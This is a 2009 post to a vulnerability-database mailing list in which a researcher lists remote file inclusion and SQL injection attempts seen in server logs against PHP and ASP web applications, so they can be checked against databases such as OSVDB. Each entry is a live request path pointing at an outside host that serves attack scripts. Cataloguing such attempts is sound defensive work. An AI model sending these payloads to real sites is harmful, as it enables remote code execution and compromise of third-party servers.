[VIM] recent round of RFI from logs
security curmudgeon
jericho at attrition.org
Sun Nov 1 04:33:57 UTC 2009
On Thu, 3 Apr 2008, security curmudgeon wrote:
: Quick searches didn't find these in OSVDB. I haven't had time to check
: the other VDBs.
new ones:
/event/list.asp?c=e%2Ename+like+%27B%25%27&all=1
/plugins/spamx/MassDelete.Admin.class.php/geeklog/plugins/spamx/BaseAdmin.class.php?_CONF%5bpath%5d=http://lanaalaadi.com/gallery/data/media/2/3/db.txt%3f%3f
IMGallery galeria.php kategoria Parameter SQL Injection
RFI too?
/pipermail/vim/2006-June.txt%20%20//galeria.php?start=0&kategoria=http://www.diakonia-jkt.sch.id/upload/id1???
/includes/class_item.php?fileExtension=http://www.diakonia-jkt.sch.id/upload/id1??
/bbshop/admin/admin.php?_shop_path=http://www.diakonia-jkt.sch.id/upload/id1???
/index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ssdnb.net//bbs//zfxid1.txt?
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.miomatrimonio.com/editor/aid.txt%3f%3f
/modules/xfsection/modify.php?GALLERY_BASEDIR=http://fmmkor.org/zboard/data/mission/1.swf
More information about the VIM
mailing list